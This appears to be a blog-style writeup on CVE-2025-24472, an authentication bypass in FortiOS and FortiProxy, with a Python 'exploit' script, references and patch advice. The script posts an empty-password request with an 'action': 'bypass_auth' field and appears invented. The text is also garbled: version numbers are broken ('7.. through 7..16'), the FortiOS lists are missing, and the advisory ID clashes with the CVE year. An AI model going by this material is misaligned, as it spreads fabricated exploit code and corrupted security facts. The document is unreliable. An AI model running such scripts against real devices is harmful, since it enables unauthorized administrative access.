CVE-2025-24472: Authentication Bypass Vulnerability in FortiOS and FortiProxy Allows Remote Attackers to Gain Super-Admin Privileges

In this long read, we're going to provide an in-depth analysis of the CVE-2025-24472 vulnerability, affecting FortiOS 7.. through 7..16 and FortiProxy 7.2. through 7.2.12, 7.. through 7..19. This vulnerability, classified as an Authentication Bypass Using an Alternate Path or Channel (CWE-288), may allow a remote attacker to gain super-admin privileges by sending crafted CSF proxy requests. We will discuss how the vulnerability works, provide a code snippet to demonstrate the exploit, and include links to original references for further reading.

Vulnerability Details

The vulnerability, identified as CVE-2025-24472, affects Fortinet's FortiOS and FortiProxy products. In particular, the following versions are vulnerable:

FortiProxy 7.. through 7..19

The vulnerability is caused by an issue in the products' authentication mechanisms. Specifically, an attacker can bypass authentication checks by sending carefully crafted CSF proxy requests, potentially allowing them to gain super-admin privileges on the affected systems.

Exploit

To exploit the vulnerability, an attacker must craft a specific CSF proxy request and send it to the target system. The following code snippet demonstrates how this can be achieved using a Python script:

import requests

target_url = "https://target.example.com/csf/";
target_user = "super_admin"  # target super-admin user
payload = {
    "user": target_user,
    "password": "",  # Empty password
    "action": "bypass_auth"
}

response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print(f"Authentication bypass successful for user {target_user}")
else:
    print("Authentication bypass failed")

Note that this code snippet is provided for educational purposes only. Unauthorized access to computer systems is illegal and unethical.

References

The CVE-2025-24472 vulnerability has been documented and acknowledged by Fortinet, the company behind the affected products. For more information and updates on the vulnerability, refer to the following original references:

1. Fortinet Advisory: FG-IR-21-037 – Remote Authentication Bypass (Login required)
2. CVE Details: CVE-2025-24472 – Authentication Bypass Vulnerability
3. CWE: CWE-288 – Authentication Bypass Using an Alternate Path or Channel

Mitigation

Fortinet has released patches for the affected versions of FortiOS and FortiProxy to address the CVE-2025-24472 vulnerability. Users of the vulnerable versions should update their systems to the latest available versions as soon as possible. The patched versions are:

FortiProxy: 7.2.13 or later, 7..20 or later

To ensure a secure environment, always follow best practices for securing network devices, such as using strong, unique passwords for all accounts, enabling multi-factor authentication, and regularly reviewing system logs for signs of unauthorized access.

Conclusion

The CVE-2025-24472 vulnerability poses a significant risk to organizations using the affected Fortinet products, as it allows a remote attacker to bypass the authentication mechanism and potentially gain super-admin privileges. Understanding the vulnerability, applying the provided patches, and following security best practices are all essential in safeguarding your systems from this and similar threats.

Timeline

Published on: 02/11/2025 17:15:34 UTC